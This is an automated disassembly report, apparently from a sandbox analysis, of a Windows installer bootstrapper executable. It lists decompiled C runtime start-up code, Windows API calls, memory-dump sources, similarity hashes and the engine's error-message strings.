                                                                                                                                                                  			E00429B5D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                  				signed int* _t80;
                                                                                                                                                                  				signed int _t84;
                                                                                                                                                                  				long _t88;
                                                                                                                                                                  				intOrPtr _t92;
                                                                                                                                                                  				signed int _t96;
                                                                                                                                                                  				signed int _t97;
                                                                                                                                                                  				signed char _t101;
                                                                                                                                                                  				intOrPtr* _t103;
                                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                                  				intOrPtr* _t107;
                                                                                                                                                                  				signed char _t109;
                                                                                                                                                                  				long _t117;
                                                                                                                                                                  				signed int _t126;
                                                                                                                                                                  				signed int* _t130;
                                                                                                                                                                  				intOrPtr _t131;
                                                                                                                                                                  				signed int* _t134;
                                                                                                                                                                  				void** _t135;
                                                                                                                                                                  				intOrPtr _t137;
                                                                                                                                                                  				void* _t138;
                                                                                                                                                                  				signed int _t139;
                                                                                                                                                                  				void** _t143;
                                                                                                                                                                  				signed int _t145;
                                                                                                                                                                  				void* _t146;
                                                                                                                                                                  				void** _t150;
                                                                                                                                                                  				void* _t151;
                                                                                                                                                                  
                                                                                                                                                                  				_push(0x64);
                                                                                                                                                                  				_push(0x454100);
                                                                                                                                                                  				E0042A650(__ebx, __edi, __esi);
                                                                                                                                                                  				E0042BF92(0xb);
                                                                                                                                                                  				_t126 = 0;
                                                                                                                                                                  				 *(_t151 - 4) = 0;
                                                                                                                                                                  				_push(0x40);
                                                                                                                                                                  				_t137 = 0x20;
                                                                                                                                                                  				_push(_t137);
                                                                                                                                                                  				_t80 = E0042C10B();
                                                                                                                                                                  				_t130 = _t80;
                                                                                                                                                                  				 *(_t151 - 0x24) = _t130;
                                                                                                                                                                  				if(_t130 != 0) {
                                                                                                                                                                  					 *0x457610 = _t80;
                                                                                                                                                                  					 *0x459054 = _t137;
                                                                                                                                                                  					while(_t130 <  &(_t80[0x200])) {
                                                                                                                                                                  						_t130[1] = 0xa00;
                                                                                                                                                                  						 *_t130 =  *_t130 | 0xffffffff;
                                                                                                                                                                  						_t130[2] = _t126;
                                                                                                                                                                  						_t130[9] = _t130[9] & 0x00000080;
                                                                                                                                                                  						_t130[9] = _t130[9] & 0x0000007f;
                                                                                                                                                                  						_t130[9] = 0xa0a;
                                                                                                                                                                  						_t130[0xe] = _t126;
                                                                                                                                                                  						_t130[0xd] = _t126;
                                                                                                                                                                  						_t130 =  &(_t130[0x10]);
                                                                                                                                                                  						 *(_t151 - 0x24) = _t130;
                                                                                                                                                                  						_t80 =  *0x457610;
                                                                                                                                                                  					}
                                                                                                                                                                  					GetStartupInfoW(_t151 - 0x74);
                                                                                                                                                                  					if( *((short*)(_t151 - 0x42)) == 0) {
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							L27:
                                                                                                                                                                  							 *(_t151 - 0x2c) = _t126;
                                                                                                                                                                  							if(_t126 >= 3) {
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t143 =  *0x457610 + (_t126 << 6);
                                                                                                                                                                  							 *(_t151 - 0x24) = _t143;
                                                                                                                                                                  							if( *_t143 == 0xffffffff ||  *_t143 == 0xfffffffe) {
                                                                                                                                                                  								_t143[1] = 0x81;
                                                                                                                                                                  								if(_t126 != 0) {
                                                                                                                                                                  									_t65 = _t126 - 1; // -1
                                                                                                                                                                  									asm("sbb eax, eax");
                                                                                                                                                                  									_t88 =  ~_t65 + 0xfffffff5;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t88 = 0xfffffff6;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t138 = GetStdHandle(_t88);
                                                                                                                                                                  								if(_t138 == 0xffffffff || _t138 == 0) {
                                                                                                                                                                  									L43:
                                                                                                                                                                  									_t143[1] = _t143[1] | 0x00000040;
                                                                                                                                                                  									 *_t143 = 0xfffffffe;
                                                                                                                                                                  									_t92 =  *0x457fa0;
                                                                                                                                                                  									if(_t92 != 0) {
                                                                                                                                                                  										 *( *((intOrPtr*)(_t92 + _t126 * 4)) + 0x10) = 0xfffffffe;
                                                                                                                                                                  									}
                                                                                                                                                                  									goto L45;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t96 = GetFileType(_t138);
                                                                                                                                                                  									if(_t96 == 0) {
                                                                                                                                                                  										goto L43;
                                                                                                                                                                  									}
                                                                                                                                                                  									 *_t143 = _t138;
                                                                                                                                                                  									_t97 = _t96 & 0x000000ff;
                                                                                                                                                                  									if(_t97 != 2) {
                                                                                                                                                                  										if(_t97 != 3) {
                                                                                                                                                                  											L42:
                                                                                                                                                                  											_t69 =  &(_t143[3]); // -4552196
                                                                                                                                                                  											InitializeCriticalSectionAndSpinCount(_t69, 0xfa0);
                                                                                                                                                                  											_t143[2] = _t143[2] + 1;
                                                                                                                                                                  											goto L45;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t101 = _t143[1] | 0x00000008;
                                                                                                                                                                  										L41:
                                                                                                                                                                  										_t143[1] = _t101;
                                                                                                                                                                  										goto L42;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t101 = _t143[1] | 0x00000040;
                                                                                                                                                                  									goto L41;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t143[1] = _t143[1] | 0x00000080;
                                                                                                                                                                  								L45:
                                                                                                                                                                  								_t126 = _t126 + 1;
                                                                                                                                                                  								continue;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						 *(_t151 - 4) = 0xfffffffe;
                                                                                                                                                                  						E00429E02();
                                                                                                                                                                  						_t84 = 0;
                                                                                                                                                                  						L47:
                                                                                                                                                                  						return E0042A695(_t84);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t103 =  *((intOrPtr*)(_t151 - 0x40));
                                                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                                                  						goto L27;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t131 =  *_t103;
                                                                                                                                                                  					 *((intOrPtr*)(_t151 - 0x1c)) = _t131;
                                                                                                                                                                  					_t104 = _t103 + 4;
                                                                                                                                                                  					 *((intOrPtr*)(_t151 - 0x28)) = _t104;
                                                                                                                                                                  					 *(_t151 - 0x20) = _t104 + _t131;
                                                                                                                                                                  					if(_t131 >= 0x800) {
                                                                                                                                                                  						_t131 = 0x800;
                                                                                                                                                                  						 *((intOrPtr*)(_t151 - 0x1c)) = 0x800;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t145 = 1;
                                                                                                                                                                  					 *(_t151 - 0x30) = 1;
                                                                                                                                                                  					while( *0x459054 < _t131) {
                                                                                                                                                                  						_t134 = E0042C10B(_t137, 0x40);
                                                                                                                                                                  						 *(_t151 - 0x24) = _t134;
                                                                                                                                                                  						if(_t134 != 0) {
                                                                                                                                                                  							0x457610[_t145] = _t134;
                                                                                                                                                                  							 *0x459054 =  *0x459054 + _t137;
                                                                                                                                                                  							while(_t134 <  &(0x457610[_t145][0x200])) {
                                                                                                                                                                  								_t134[1] = 0xa00;
                                                                                                                                                                  								 *_t134 =  *_t134 | 0xffffffff;
                                                                                                                                                                  								_t134[2] = _t126;
                                                                                                                                                                  								_t134[9] = _t134[9] & 0x00000080;
                                                                                                                                                                  								_t134[9] = 0xa0a;
                                                                                                                                                                  								_t134[0xe] = _t126;
                                                                                                                                                                  								_t134[0xd] = _t126;
                                                                                                                                                                  								_t134 =  &(_t134[0x10]);
                                                                                                                                                                  								 *(_t151 - 0x24) = _t134;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t145 = _t145 + 1;
                                                                                                                                                                  							 *(_t151 - 0x30) = _t145;
                                                                                                                                                                  							_t131 =  *((intOrPtr*)(_t151 - 0x1c));
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t131 =  *0x459054;
                                                                                                                                                                  						 *((intOrPtr*)(_t151 - 0x1c)) = _t131;
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t139 = _t126;
                                                                                                                                                                  					 *(_t151 - 0x2c) = _t139;
                                                                                                                                                                  					_t107 =  *((intOrPtr*)(_t151 - 0x28));
                                                                                                                                                                  					_t135 =  *(_t151 - 0x20);
                                                                                                                                                                  					while(_t139 < _t131) {
                                                                                                                                                                  						_t146 =  *_t135;
                                                                                                                                                                  						if(_t146 == 0xffffffff || _t146 == 0xfffffffe) {
                                                                                                                                                                  							L22:
                                                                                                                                                                  							_t139 = _t139 + 1;
                                                                                                                                                                  							 *(_t151 - 0x2c) = _t139;
                                                                                                                                                                  							_t107 =  *((intOrPtr*)(_t151 - 0x28)) + 1;
                                                                                                                                                                  							 *((intOrPtr*)(_t151 - 0x28)) = _t107;
                                                                                                                                                                  							_t135 =  &(_t135[1]);
                                                                                                                                                                  							 *(_t151 - 0x20) = _t135;
                                                                                                                                                                  							continue;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t109 =  *_t107;
                                                                                                                                                                  							if((_t109 & 0x00000001) == 0) {
                                                                                                                                                                  								goto L22;
                                                                                                                                                                  							}
                                                                                                                                                                  							if((_t109 & 0x00000008) != 0) {
                                                                                                                                                                  								L20:
                                                                                                                                                                  								_t150 = 0x457610[_t139 >> 5] + ((_t139 & 0x0000001f) << 6);
                                                                                                                                                                  								 *(_t151 - 0x24) = _t150;
                                                                                                                                                                  								 *_t150 =  *_t135;
                                                                                                                                                                  								_t150[1] =  *((intOrPtr*)( *((intOrPtr*)(_t151 - 0x28))));
                                                                                                                                                                  								_t37 =  &(_t150[3]); // 0xd
                                                                                                                                                                  								InitializeCriticalSectionAndSpinCount(_t37, 0xfa0);
                                                                                                                                                                  								_t150[2] = _t150[2] + 1;
                                                                                                                                                                  								_t135 =  *(_t151 - 0x20);
                                                                                                                                                                  								L21:
                                                                                                                                                                  								_t131 =  *((intOrPtr*)(_t151 - 0x1c));
                                                                                                                                                                  								goto L22;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t117 = GetFileType(_t146);
                                                                                                                                                                  							_t135 =  *(_t151 - 0x20);
                                                                                                                                                                  							if(_t117 == 0) {
                                                                                                                                                                  								goto L21;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L20;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L27;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t84 = E0042D520(_t151, 0x4560d0, _t151 - 0x10, 0xfffffffe) | 0xffffffff;
                                                                                                                                                                  				goto L47;
                                                                                                                                                                  			}





























                                                                                                                                                                  APIs
                                                                                                                                                                  • __lock.LIBCMT ref: 00429B6B
                                                                                                                                                                    • Part of subcall function 0042BF92: __mtinitlocknum.LIBCMT ref: 0042BFA4
                                                                                                                                                                    • Part of subcall function 0042BF92: EnterCriticalSection.KERNEL32(00000000,?,00429541,0000000D,004540B8,00000008,004294D3,00000000,00000000,004079F6,?,00000000,00000000), ref: 0042BFBD
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 00429B7C
                                                                                                                                                                    • Part of subcall function 0042C10B: __calloc_impl.LIBCMT ref: 0042C11A
                                                                                                                                                                    • Part of subcall function 0042C10B: Sleep.KERNEL32(00000000,?,00000000,00000000), ref: 0042C131
                                                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00429B97
                                                                                                                                                                  • GetStartupInfoW.KERNEL32(?,00454100,00000064,004266C2,00454020,00000014), ref: 00429BF0
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 00429C3B
                                                                                                                                                                  • GetFileType.KERNEL32(00000001), ref: 00429C82
                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00429CBB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1426640281-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 004182D5
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00418450
                                                                                                                                                                  Strings
                                                                                                                                                                  • UX requested unknown container with id: %ls, xrefs: 0041837A
                                                                                                                                                                  • Failed to set download user., xrefs: 004183D8
                                                                                                                                                                  • UX requested unknown payload with id: %ls, xrefs: 0041832A
                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 004182EF
                                                                                                                                                                  • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 00418340
                                                                                                                                                                  • Failed to set download password., xrefs: 004183FE
                                                                                                                                                                  • UX did not provide container or payload id., xrefs: 0041843F
                                                                                                                                                                  • Failed to set download URL., xrefs: 004183AF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                  • API String ID: 3168844106-2615595102
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,000000F8,000000F8,00000030,000000F8,00000100,?,00000000,?,?), ref: 00403841
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000), ref: 00403973
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to read variable value as number., xrefs: 00403947
                                                                                                                                                                  • Failed to read variable count., xrefs: 00403861
                                                                                                                                                                  • Failed to set variable., xrefs: 0040394E
                                                                                                                                                                  • Failed to read variable value type., xrefs: 00403955
                                                                                                                                                                  • Failed to read variable included flag., xrefs: 00403963
                                                                                                                                                                  • Failed to read variable value as string., xrefs: 00403934
                                                                                                                                                                  • Unsupported variable type., xrefs: 00403940
                                                                                                                                                                  • Failed to read variable name., xrefs: 0040395C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable.$Unsupported variable type.
                                                                                                                                                                  • API String ID: 3168844106-1201737872
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405F61
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405F86
                                                                                                                                                                  Strings
                                                                                                                                                                  • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 00406074
                                                                                                                                                                  • Failed to get component path: %d, xrefs: 00405FEA
                                                                                                                                                                  • Failed to set variable., xrefs: 00406064
                                                                                                                                                                  • Failed to format component id string., xrefs: 00405F6C
                                                                                                                                                                  • Failed to format product code string., xrefs: 00405F91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                  • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                                                                                                                                  • API String ID: 3613110473-1671347822
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • PeekMessageW.USER32 ref: 00401389
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040138F
                                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040141D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to start bootstrapper application., xrefs: 004013EB
                                                                                                                                                                  • Failed to load UX., xrefs: 004013D2
                                                                                                                                                                  • Failed to create engine for UX., xrefs: 004013A9
                                                                                                                                                                  • Unexpected return value from message pump., xrefs: 00401473
                                                                                                                                                                  • engine.cpp, xrefs: 00401469
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$CurrentPeekThread
                                                                                                                                                                  • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp
                                                                                                                                                                  • API String ID: 673430819-3216346975
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00401414,00000008,00000000,00000000,?,00000000,00000000,00401414,00000000,00000000,?,00000088,00000000,00000000,000000B8), ref: 0040EDAA
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040EDB7
                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 0040EE58
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040EE62
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                  • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
                                                                                                                                                                  • API String ID: 1948546556-3912962418
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,7519F730,00000000,?,?,?,?,00424E6B,?), ref: 00424B79
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,00424E6B,?), ref: 00424B9C
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00424E6B,?), ref: 00424BDD
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,00424E6B,?), ref: 00424BF4
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00424E6B,?), ref: 00424BFD
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to send files in use message from netfx chainer., xrefs: 00424C43
                                                                                                                                                                  • kNB, xrefs: 00424BBD
                                                                                                                                                                  • Failed to get message from netfx chainer., xrefs: 00424C1E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                                  • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.$kNB
                                                                                                                                                                  • API String ID: 2608678126-2889711910
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0040F98D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,004018F4,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 0040F998
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write exit code to message buffer., xrefs: 0040F908
                                                                                                                                                                  • Failed to post terminate message to child process cache thread., xrefs: 0040F95C
                                                                                                                                                                  • Failed to wait for child process exit., xrefs: 0040F9C6
                                                                                                                                                                  • Failed to write restart to message buffer., xrefs: 0040F925
                                                                                                                                                                  • pipe.cpp, xrefs: 0040F9BC
                                                                                                                                                                  • Failed to post terminate message to child process., xrefs: 0040F978
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                                                                  • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                                                                                                                  • API String ID: 1211598281-2161881128
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,004137D2,00000003,000007D0,00000003,?,000007D0), ref: 0041288A
                                                                                                                                                                  • GetLastError.KERNEL32(?,004137D2,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,000000F9,00000001), ref: 00412897
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,004137D2,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,000000F9), ref: 0041295E
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to verify hash of payload: %ls, xrefs: 00412949
                                                                                                                                                                  • Failed to verify signature of payload: %ls, xrefs: 00412906
                                                                                                                                                                  • Failed to verify catalog signature of payload: %ls, xrefs: 00412925
                                                                                                                                                                  • Failed to open payload at path: %ls, xrefs: 004128DA
                                                                                                                                                                  • cache.cpp, xrefs: 004128CD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-2757871984
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004033C9
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004033D3
                                                                                                                                                                  • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00403417
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00403421
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                                                                                                                  • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 124030351-4026719079
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405CF0
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002A8,?,00000000,00000000,000000F8,000000F8,00000000,000002D0,?,0040688D,000000F8,000000F8,000000F8,?,000000F8), ref: 00405D08
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040688D,000000F8,000000F8,000000F8,?,000000F8,000000F8,000000F8,000002A8,000000F8), ref: 00405D13
                                                                                                                                                                  Strings
                                                                                                                                                                  • search.cpp, xrefs: 00405D45
                                                                                                                                                                  • Failed get to file attributes. '%ls', xrefs: 00405D52
                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00405D67
                                                                                                                                                                  • Failed to set variable., xrefs: 00405D98
                                                                                                                                                                  • Failed to format variable string., xrefs: 00405CFB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                  • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                                                                                                                  • API String ID: 1811509786-2053429945
                                                                                                                                                                  • Opcode ID: 554180c7c558113d035d5f8f74b8aae5e81e503c2d7feb5be628f95ef0bdc85b
                                                                                                                                                                  • Instruction ID: 04c92a825a784e8b014ce0a1ff5a4e98947bb56fa085453003331f1cd54be0ca
                                                                                                                                                                  • Opcode Fuzzy Hash: 554180c7c558113d035d5f8f74b8aae5e81e503c2d7feb5be628f95ef0bdc85b
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E210A32940620BBEF216A65AC4EFAF76A5DF44714F208127FD04F91D0E779CD009AA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
